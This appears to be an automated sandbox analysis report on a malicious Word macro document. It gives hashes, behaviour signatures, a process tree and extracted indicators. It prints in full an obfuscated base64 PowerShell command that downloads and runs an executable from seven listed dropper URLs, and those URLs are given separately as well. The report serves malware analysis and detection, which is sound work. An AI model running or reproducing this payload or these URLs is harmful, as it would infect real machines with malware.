Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    08/05/2024, 17:21

General

  • Target

    25e7a78d75a2e78f6b3aad195f02c339_JaffaCakes118.doc

  • Size

    155KB

  • MD5

    25e7a78d75a2e78f6b3aad195f02c339

  • SHA1

    2042542bd5462ca0adcf4880519101ab9a542dcf

  • SHA256

    516d2c1801739512c12fd4df367d4eb778b8597b91ec6a984d30da7ad74e435f

  • SHA512

    58766357b89e87e739c62e2b21729b4d068f20f9056cb150b8cfff98f3096627b54a54c1eee3ef8b924736a8ad65b7d2354f6b0083b49bde586b9a84e187d870

  • SSDEEP

    1536:R6+PU6+Ptrdi1Ir77zOH98Wj2gpngR+a9ds+kO5kZi1:srfrzOH98ipgG3O5kZi1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://gvoprint.com/wp-admin/FurWrq/

exe.dropper

https://www.amcouture.ro/wp-admin/K28Yjp6C1/

exe.dropper

https://smartrent.com.co/wp-content/uploads/s0nOjuEszW/

exe.dropper

https://lucysite.xyz/ulehp/xFpyrYT9mD/

exe.dropper

http://aminramin.com/wp-content/MD/

exe.dropper

http://jituogroup.com/wp-content/uploads/3/

exe.dropper

https://ngothuyspa.com/wp-includes/8fSO/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\25e7a78d75a2e78f6b3aad195f02c339_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2168
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABUAHMAcgBkADkANgBnAD0AKAAnAE8AaQAnACsAKAAnADYAeABwACcAKwAnAHcAeQAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAcgBQAHIAbwBmAEkAbABFAFwAYgBjAHIAUwBjAHMARQBcAFcAOQB6AGIAbABwADMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIARQBjAFQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAFUAUgBgAEkAdABZAFAAYABSAG8AdABPAEMAYABPAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACsAKAAnACwAIAAnACsAJwB0AGwAJwArACcAcwAxADEALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABVAGIANQBwAG0AagB0ACAAPQAgACgAJwBNACcAKwAoACcAMQA0ACcAKwAnAGgANgAnACkAKwAoACcAbwB0ACcAKwAnADQAJwApACkAOwAkAEYAbQB4AG8AcABfAG4APQAoACgAJwBBAHkANgAnACsAJwA0ACcAKQArACgAJwBwACcAKwAnAHEAaAAnACkAKQA7ACQASABtAGIAZwB2AGMAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAfQBCAGMAcgAnACsAJwBzAGMAJwArACcAcwBlAHsAJwArACcAMAB9AFcAOQB6AGIAbABwADMAJwArACcAewAnACsAJwAwAH0AJwApACAAIAAtAGYAIAAgAFsAYwBoAGEAUgBdADkAMgApACsAJABVAGIANQBwAG0AagB0ACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQASwAwADUAeAByAHAAaQA9ACgAJwBEACcAKwAoACcAdgAnACsAJwB2AHcAJwApACsAKAAnAHYAMAAnACsAJwBuACcAKQApADsAJABEAHkAZAAyAHEAXwBiAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBCAEMAbABJAEUAbgBUADsAJABEAGEAdAB4AHoAagBiAD0AKAAoACcAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAcwA6AC8ALwAnACsAJwBnACcAKwAnAHYAbwBwACcAKwAnAHIAaQBuACcAKQArACcAdAAnACsAKAAnAC4AYwAnACsAJwBvAG0ALwAnACkAKwAoACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAnAG4AJwArACcALwAnACsAJwBGAHUAJwArACcAcgAnACsAJwBXACcAKwAoACcAcgBxACcAKwAnAC8AKgBoAHQAJwArACcAdABwACcAKQArACcAcwAnACsAJwA6ACcAKwAoACcALwAvACcAKwAnAHcAdwB3ACcAKQArACcALgBhACcAKwAnAG0AJwArACgAJwBjACcAKwAnAG8AdQAnACkAKwAnAHQAJwArACgAJwB1AHIAJwArACcAZQAuACcAKQArACgAJwByAG8ALwB3ACcAKwAnAHAAJwApACsAJwAtACcAKwAnAGEAZAAnACsAJwBtACcAKwAoACcAaQBuAC8AJwArACcASwAnACkAKwAnADIAJwArACgAJwA4AFkAJwArACcAagBwACcAKQArACcANgAnACsAKAAnAEMAMQAnACsAJwAvACcAKQArACgAJwAqAGgAdAAnACsAJwB0AHAAJwApACsAKAAnAHMAOgAvACcAKwAnAC8AJwApACsAKAAnAHMAJwArACcAbQBhACcAKQArACgAJwByAHQAcgBlAG4AdAAuACcAKwAnAGMAbwBtAC4AJwArACcAYwAnACkAKwAnAG8ALwAnACsAKAAnAHcAcAAnACsAJwAtACcAKQArACcAYwAnACsAJwBvAG4AJwArACcAdABlACcAKwAoACcAbgB0ACcAKwAnAC8AJwArACcAdQBwAGwAbwAnACsAJwBhAGQAcwAvAHMAMABuAE8AagB1ACcAKQArACgAJwBFAHMAegAnACsAJwBXACcAKwAnAC8AKgAnACsAJwBoAHQAdABwAHMAOgAvACcAKwAnAC8AbAB1AGMAeQBzAGkAdABlAC4AJwArACcAeAB5AHoAJwApACsAKAAnAC8AJwArACcAdQBsAGUAJwApACsAJwBoAHAAJwArACcALwAnACsAJwB4ACcAKwAoACcARgAnACsAJwBwAHkAcgBZACcAKQArACcAVAA5ACcAKwAoACcAbQAnACsAJwBEAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACcAOgAvAC8AJwArACcAYQBtACcAKQArACgAJwBpACcAKwAnAG4AcgBhAG0AJwApACsAJwBpACcAKwAnAG4AJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAnACsAJwAvACcAKwAnAHcAcAAtAGMAbwAnACsAJwBuAHQAJwArACcAZQBuAHQALwBNACcAKQArACcARAAvACcAKwAoACcAKgBoAHQAdABwACcAKwAnADoAJwApACsAKAAnAC8ALwBqACcAKwAnAGkAdAAnACkAKwAnAHUAJwArACgAJwBvAGcAcgBvAHUAcAAnACsAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuACcAKwAnAHQAJwApACsAKAAnAGUAJwArACcAbgAnACsAJwB0AC8AdQBwAGwAbwAnACkAKwAoACcAYQBkACcAKwAnAHMAJwApACsAKAAnAC8AMwAvACoAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAbgBnAG8AJwArACcAdABoAHUAeQAnACsAJwBzAHAAYQAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAJwB3ACcAKwAoACcAcAAtACcAKwAnAGkAJwApACsAJwBuACcAKwAoACcAYwBsACcAKwAnAHUAZABlACcAKQArACgAJwBzAC8AOABmAFMAJwArACcATwAnACkAKwAnAC8AJwApAC4AIgBTAHAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFIANwAxAHQAdAB5AGUAPQAoACgAJwBNAG0AbwAnACsAJwAwADUAJwApACsAJwAzACcAKwAnAGIAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVgBfAGQANQBqAGwANwAgAGkAbgAgACQARABhAHQAeAB6AGoAYgApAHsAdAByAHkAewAkAEQAeQBkADIAcQBfAGIALgAiAEQAYABPAGAAVwBOAEwAYABPAGEAZABmAGkATABlACIAKAAkAFYAXwBkADUAagBsADcALAAgACQASABtAGIAZwB2AGMAcgApADsAJABQAGsAcABxADEAZgAyAD0AKAAnAEMAbgAnACsAKAAnAGsANQBvACcAKwAnADIAJwApACsAJwAxACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABIAG0AYgBnAHYAYwByACkALgAiAGwARQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMgAxADEAMwA3ACkAIAB7AC4AKAAnAEkAbgB2ACcAKwAnAG8AawBlACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAKAAkAEgAbQBiAGcAdgBjAHIAKQA7ACQAWABlAHUAMQB5AG4AMgA9ACgAKAAnAE8AJwArACcAZgBlAGEAawAnACsAJwBxACcAKQArACcAbQAnACkAOwBiAHIAZQBhAGsAOwAkAEgAYQBrAHUAOABqAHQAPQAoACgAJwBYAHAAJwArACcAZgBvACcAKQArACgAJwBrADcAJwArACcAMgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQB5ADkAeQBzAHUAOQA9ACgAKAAnAFIAeABmACcAKwAnAF8AJwApACsAKAAnAHcAJwArACcANAA0ACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:324

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      8ebbcf37130562e7c0b6c0a67fcdf6c0

      SHA1

      aed18c69fd1ed794c4b1eab88b61c27c8d6bf5a0

      SHA256

      9ec5e8172d4a28b093f1bc4c046c923aed2058983deb95e3af04fbb33981b0c1

      SHA512

      cf5ebe85404f6ab445aeb1fb1dc75a126fecc9dbdd7cc147f83ece20e14173699602a3a3e7cdec8464ce5be4777b36ece623a345d78e5e3fe9346a9083937d4e

    • memory/324-39-0x000000001B580000-0x000000001B862000-memory.dmp

      Filesize

      2.9MB

    • memory/324-40-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

    • memory/2140-15-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-31-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-8-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-9-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-10-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-12-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-13-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-11-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-14-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-16-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-32-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-21-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-20-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-19-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-17-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-0-0x000000002FFE1000-0x000000002FFE2000-memory.dmp

      Filesize

      4KB

    • memory/2140-7-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-26-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-22-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-30-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-29-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-28-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-27-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-25-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-24-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-23-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-33-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-6-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-2-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

    • memory/2140-46-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

    • memory/2140-47-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2140-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2140-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2140-64-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB